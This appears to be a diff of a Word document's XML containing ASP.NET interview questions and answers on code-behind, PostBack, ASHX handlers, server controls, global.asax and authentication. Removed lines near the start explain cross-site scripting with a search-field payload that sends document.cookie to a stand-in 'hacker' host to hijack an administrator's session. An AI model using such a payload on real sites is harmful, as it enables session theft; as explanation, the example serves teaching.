-        <w:t>&lt; title&gt;Example document: %(title)&lt;/title&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>is intended to illustrate a template snippet that, if the variable title has value Cross-Site Scripting, results in the following HTML to be emitted to the browser:</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>&lt; title&gt;Example document: XSS Doc&lt;/title&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>A site containing a search field does not have the proper input sanitizing. By crafting a search query looking something like this:</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>"&gt;&lt;SCRIPT&gt;var+img=new+</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Image(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>);img.src="http://hacker/"%20+%20document.cookie;&lt;/SCRIPT&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">Sitting on the other end, at the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Webserver</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, you will be receiving hits where after a double space is the users cookie. You might strike lucky if an administrator clicks the link, allowing you to steal their </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sessionID</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and hijack the session.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
+        <w:t xml:space="preserve"> file from which all </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Q 10:- What is the difference between Windows and Forms Authentication?</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ans</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>:- Windows Authentication: is provided so that web pages</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">can make use of the local Windows User and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Groups.In</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> it windows actual login name and</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>password is used for authentication.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>Forms Authentication: Under Forms Authentication user can able to create their own</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>login name and password it is basically a cookie based</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>authentication system which stores the login name and</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>password in database file.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:br/>
-      </w:r>
+        <w:t>web.config</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">5). Can you tell the location of the root </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> file </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>web.confit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> file from which all </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>web.config</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> file </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
         <w:t>inherit ?</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
@@ -9858,357 +9434,354 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> Page Directive in a content page's header is one way to assign a master page. The content pages rely solely on content and </w:t>
+        <w:t xml:space="preserve"> Page Directive in a content page's header is one way to assign a master page. The content pages rely solely on content and leave layout to the master page. ASP.NET merges the content with the master page layout when the content page is requested by a user.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>What is the code behind feature of ASP.NET?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The code behind feature divides ASP.NET page files into two files where one defines the user interface (.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aspx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>), while the other contains all of the logic or code (.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aspx.cs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> for C# and .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aspx.vb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> for VB.NET). These two files are glued together with page directives like the following line, which ties the page to the specific code behind class.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">&lt;%@ Page language="c#" </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Codebehind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>UICode.cs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>" Inherits="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Library.UICode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>" %&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>What are ASHX files?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>ASP.NET Web handler files have an .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ashx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> file extension. Web handlers work just like .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aspx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> files except you don't have to deal with the browser interface, thus no worrying about presentation. Web handlers are generally used to generate content dynamically like returning XML or an image. Web handlers use the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>IHttpHandler</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> interface with the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ProcessRequest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">) method invoked when the handler is requested. Web </w:t>
       </w:r>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>leave layout to the master page. ASP.NET merges the content with the master page layout when the content page is requested by a user.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>What is the code behind feature of ASP.NET?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The code behind feature divides ASP.NET page files into two files where one defines the user interface (.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aspx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>), while the other contains all of the logic or code (.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aspx.cs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> for C# and .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aspx.vb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> for VB.NET). These two files are glued together with page directives like the following line, which ties the page to the specific code behind class.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">&lt;%@ Page language="c#" </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Codebehind</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>="</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>UICode.cs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>" Inherits="</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Library.UICode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>" %&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>What are ASHX files?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>ASP.NET Web handler files have an .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ashx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> file extension. Web handlers work just like .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aspx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> files except you don't have to deal with the browser interface, thus no worrying about presentation. Web handlers are generally used to generate content dynamically like returning XML or an image. Web handlers use the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>IHttpHandler</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> interface with the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>handlers are simpler than pages (fewer events and wiring), so they are ideal for performance-critical applications.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">How does </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PostBack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> work?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PostBack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> is basically the ASP.NET submitting a form to it -- it posts back to the current URL. The JavaScript __</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>doPostBack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> function is placed on the page (look at the source within the browser) to facilitate. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PostBack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> uses </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ViewState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to remember controls and data. The </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>IsPostBack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> property of the ASP.NET page allows you to determine if the loading of the page is the result of a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>postback</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> event; this is done in the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Page_Load</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> event.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>How can you pass values between ASP.NET pages?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">There are numerous ways to accomplish this task; the option you choose depends on the environment. The oldest way to approach it is via the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>QueryString</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (i.e., passing values via URL); this is also one of the least secure ways because users can easily see the data and could possibly hack the site/page by changing parameter values. Next, you can use HTTP POST to pass values; these are available via a collection within the ASP.NET page. More specific to ASP.NET is the use of Session state, which makes information available to all pages within the ASP.NET application. Another approach is using public properties on the source page and accessing these properties on the target page. Also, you can use the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PreviousPage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> property of the current page to access control information on the referring page. The last two require the source, and target pages are within the same ASP.NET application.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>What are ASP.NET Server controls?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">ASP.NET includes a number of built-in server controls that are the foundation of its Web programming model. They have various properties to control their behavior and appearance. These controls provide an event model where events are handled on the server (whereas HTML controls are handled in the client). Server controls have the ability to maintain state (via </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ViewState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">) across requests, and they can automatically detect the browser. With these controls, you will see the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>RunAt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> attribute (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>RunAt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">="Server") that signals its processing will be done on the server. A good example of these controls is the basic </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>TextBox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> control (&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ASP</w:t>
+      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>ProcessRequest</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
+        <w:t>:TextBoxRunAt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>) method invoked when the handler is requested. Web handlers are simpler than pages (fewer events and wiring), so they are ideal for performance-critical applications.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">How does </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>PostBack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> work?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>PostBack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> is basically the ASP.NET submitting a form to it -- it posts back to the current URL. The JavaScript __</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>doPostBack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> function is placed on the page (look at the source within the browser) to facilitate. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>PostBack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> uses </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ViewState</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to remember controls and data. The </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>IsPostBack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> property of the ASP.NET page allows you to determine if the loading of the page is the result of a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>postback</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> event; this is done in the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Page_Load</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> event.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>How can you pass values between ASP.NET pages?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">There are numerous ways to accomplish this task; the option you choose depends on the environment. The oldest way to approach it is via the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>QueryString</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (i.e., passing values via URL); this is also one of the least secure ways because users can easily see the data and could possibly hack the site/page by changing parameter values. Next, you can use HTTP POST to pass values; these are available via a collection within the ASP.NET page. More specific to ASP.NET is the use of Session state, which makes information available to all pages within the ASP.NET application. Another approach is using public properties on the source page and accessing these properties on the target page. Also, you can use the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>PreviousPage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> property of the current page to access control information on the referring page. The last two require the source, and target pages are within the same ASP.NET application.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>What are ASP.NET Server controls?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">ASP.NET includes a number of built-in server controls that are the foundation of its Web programming model. They have various properties to control their behavior and appearance. These controls provide an event model where events are handled on the server (whereas HTML controls are handled in the client). Server controls have the ability to maintain state (via </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ViewState</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">) across requests, and they can automatically detect the browser. With these controls, you will see the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>RunAt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> attribute (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>RunAt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">="Server") that signals its </w:t>
-      </w:r>
+        <w:t>="Server" .... &gt;.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">What is the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>global.asax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> file?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>global.asax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> file is an optional piece of an ASP.NET application. It is located in the root of the application directory structure. It cannot be directly loaded or requested by users. It provides a place to define application- and session-wide events. You can define your own events, but it does contain default Application events like when the application starts </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Application_Start</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and ends with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Application_End</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>. The same is true for Session events (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Session_Start</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Session_End</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>How can you loop through all controls on an ASP.NET Web form?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">You can easily traverse all controls on a form via the Web Form's Controls collection. The </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>GetType</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> method can be used on each control to determine its type and how to work with it. Now, it gets tricky because the form contains a tree of controls; that is, some controls are contained within others (think of a Table). You would have to recursively loop through the controls to make sure everything is processed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">processing will be done on the server. A good example of these controls is the basic </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>TextBox</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> control (&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ASP</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>:TextBoxRunAt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>="Server" .... &gt;.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">What is the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>global.asax</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> file?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>global.asax</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> file is an optional piece of an ASP.NET application. It is located in the root of the application directory structure. It cannot be directly loaded or requested by users. It provides a place to define application- and session-wide events. You can define your own events, but it does contain default Application events like when the application starts </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Application_Start</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and ends with </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Application_End</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>. The same is true for Session events (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Session_Start</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Session_End</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>How can you loop through all controls on an ASP.NET Web form?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">You can easily traverse all controls on a form via the Web Form's Controls collection. The </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>GetType</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> method can be used on each control to determine its type and how to work with it. Now, it gets tricky because the form contains a tree of controls; that is, some controls are contained within others (think of a Table). You would have to recursively loop through the controls to make sure everything is processed.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
         <w:t xml:space="preserve">What is a </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -10220,7 +9793,6 @@
         <w:t xml:space="preserve"> file? </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>Machine.config</w:t>
       </w:r>
@@ -10228,7 +9800,6 @@
       <w:r>
         <w:t>?</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -10313,78 +9884,2056 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Helvetica"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>What are DMVs?</w:t>
+        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:spacing w:after="120"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>USING ROUTING WITH WEB FORMS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="first-para"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
